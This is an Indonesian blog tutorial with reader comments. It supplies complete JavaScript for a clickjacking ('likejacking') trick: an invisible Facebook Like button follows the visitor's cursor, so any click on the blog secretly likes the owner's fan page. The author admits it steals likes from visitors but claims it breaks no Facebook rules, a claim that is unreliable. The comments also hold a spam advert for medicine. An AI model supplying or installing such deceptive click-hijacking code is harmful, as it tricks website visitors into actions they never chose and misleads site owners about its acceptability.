Membuat Topup Fans Page Facebook di Blog Agar Banyak Yang Like

Like adalah hal yang kecil dan mudah untuk dilakukan, tapi untuk mendapatkan banyak like itu termasuk hal besar yang sangat sulit untuk dilakukan. Mungkin kita bisa saja menyuruh teman kita untuk like Fans Page kita, tapi seberapa banyak temen kita?, dan seberapa banyak yang mau?.

Untuk membantu sobat blogger dalam mengembangkan blognya dan supaya banyak yang like Fans Page, tidak ada salahnya kita menggunakan trik ini. Saya sendiri sudah mencobanya dan work, hasilnya lumayan, hampir setiap hari ada saja yang like Fans Page Blog saya, kalau sobat memasangnya selama bertahun-tahun mungkin sobat bisa mendapatkan like di FP sobat sampai ratusan bahkan ribuan.

Masalah legalnya?, tenag saja cara ini hanya menggunakan topup dan sama sekali tidak melanggar aturan like Facebook, tidak seperti autolike yang benar-benar ilegal. Tapi dengan menggunakan cara ini berarti sobat tergolong telah mencuri like dari para pengunjung karena sistem kerjanya seperti berikut :

Ketika sobat sudah memasang Topup ini, maka setiap pengunjung yang datang secara otomatis cursornya  akan diikuti oleh tombol like yang tidak terlihat, jadi ketika pengunjung mengklik di blog kita, entah mengklik link atau klik sembarangan, secara tidak sadar mereka sudah mengklik like FP kita. 

Tapi ada kekurangannya sob. Jadi ketika pengunjung baru masuk ke blog kita, maka selama beberapa detik mereka tidak akan bisa mengklik link atau tautan yang ada di blog kita karena topup ini akan menutupi dan mengikuti cursor selama beberapa detik.

Gimana?, masih mau menggunakannya?, langsung aja dah berikut ini adalah caranya :

-  copy kode dibawah ini 

<!-- Auto Like FP Blog -->
<script>
var fan_page_url = 'URL Fans Page Sobat';
var opacity = 0.0;
var time = 20000;
if((document.getElementById) && window.addEventListener || window.attachEvent){
 (function(){
  var hairCol = "#ff0000";
  var d = document;
  var my = -10;
  var mx = -10;
  var r;
  var vert = "";
  var idx = document.getElementsByTagName('div').length;
  var thehairs = "<iframe id='theiframe' scrolling='no' frameBorder='0' allowTransparency='true' src='http://www.facebook.com/widgets/like.php?href=" + encodeURIComponent(fan_page_url) + "&amp;layout=standard&amp;show_faces=true&amp;width=53&amp;action=like&amp;colorscheme=light&amp;height=80' style='position:absolute;width:53px;height:23px;overflow:hidden;border:0;opacity:" + opacity +";filter:alpha(opacity=" + opacity * 100+ ");'></iframe>";
  document.write(thehairs);
  var like = document.getElementById("theiframe");
  document.getElementsByTagName('body')[0].appendChild(like);
  var pix = "px";
  var domWw = (typeof window.innerWidth == "number");
  var domSy = (typeof window.pageYOffset == "number");
  if (domWw)
   r = window;
  else{
   if (d.documentElement && typeof d.documentElement.clientWidth == "number" && d.documentElement.clientWidth != 0)
    r = d.documentElement;
   else{
    if (d.body && typeof d.body.clientWidth == "number")
     r = d.body;
   }
  }
    if(time != 0){
   setTimeout(function(){
      document.getElementsByTagName('body')[0].removeChild(like);
      if (window.addEventListener){
       document.removeEventListener("mousemove",mouse,false);
      }
      else if (window.attachEvent){
       document.detachEvent("onmousemove",mouse);
      }
     }, time);
  }
  function scrl(yx){
   var y,x;
   if (domSy){
    y = r.pageYOffset;
    x = r.pageXOffset;
   }
   else{
    y = r.scrollTop;
    x = r.scrollLeft;
   }
   return (yx == 0) ? y:x;
  }
  function mouse(e){
   var msy = (domSy)?window.pageYOffset:0;
   if (!e)
    e = window.event;  
   if (typeof e.pageY == 'number'){
    my = e.pageY - 5 - msy;
    mx = e.pageX - 4;
   }
   else{
    my = e.clientY - 6 - msy;
    mx = e.clientX - 6;
   }
   vert.top = my + scrl(0) + pix;
   vert.left = mx + pix;
  }
  function ani(){
   vert.top = my + scrl(0) + pix;
   setTimeout(ani, 300);
  }
  function init(){
   vert = document.getElementById("theiframe").style;
   ani();
  }
  if (window.addEventListener){
   window.addEventListener("load",init,false);
   document.addEventListener("mousemove",mouse,false);
  }
  else if (window.attachEvent){
   window.attachEvent("onload",init);
   document.attachEvent("onmousemove",mouse);
  }
 })();
}//End.
</script>

Ket :
Ganti URL Fans Page Sobat dengan URL FansPage sobat, contohnya seperti ini "http://www.facebook.com/pages/Pro-Duck/111910508980375"

-  kemudian masuk pada blogger sobat
-  masuk ke Tata Letak -> Tambah Gadget
-  pilih HTML/Java Script
-  pastekan kode diatas pada HTML/Java Script
-  terakhir tekan save dan selesai

Sekian saja yang dapat saya sampaikan, semoga artikel diatas bermanfaat, dan terima kasih atas kunjungannya..   ^_^

Keyword :
Auto like Fans Page
Topup like Fans Page di blog
cara membuat Fans Page di blog menjadi banyak yang like


Pro Duck Membuat Topup Fans Page Facebook di Blog Agar Banyak Yang Like By Pro Duck Published: 2013-03-22T17:34:00+07:00 Membuat Topup Fans Page Facebook di Blog Agar Banyak Yang Like 4.5 758 reviews

9 Komentar:

Ananda Fariz said...

Bro, java scriptnya gak work tuh

Imam Syafi'uddin said...

@Ananda FarizG work gimana sob?.. mungkin ada yang terlewat stepnya, ane udah gunain, dan udah di test ulang, work aja tuh sob.. emang worknya g terasa sob..

Riki Rofiki said...

tertarik sih gan
tapi selama beberapa detiknya itu loh :(
takut blog nya di banned

imam syafi'uddin said...

@Riki Rofikiwwkwkwk, d banned ama siapa sob?, mungkin kalo sobat ikut GA emang pasti ke banned, tp kalo cuman blog yg g ada adnya, siapa yg mau ngebanned,. Google?. G mungkin dah, cara ini cuman topup aja kok..

Faizz Prayoga said...

Skripnya ya....ampun panjang amat itu...gannnnapa g' membuat blog kite tambah berat???

imam syafi'uddin said...

@Faizz Prayogag kok gan, kalo takut buat berat, taruh aja di footer, biar terload belakangan, jadi g pengaruhin load blog..

Anonymous said...

Thanks gan, ini work dgn baik :-)

Tlong kunjungi http://cerpen-46p.blogspot.com ya, ksih nilai n pndapatnya coz aku msih pemula

Alfrandhy dharwisi said...

sob ga work kayaknya ga ada tuh di blog saya

Apotik Denature said...

Obat Sipilis Raja Singa Paling Ampuh ? Segera Hubungi Kami Dan Pesan Obatnya Sekarang Juga di Fast Respond : 087705015423 PIN : 207C6F18.

Post a Comment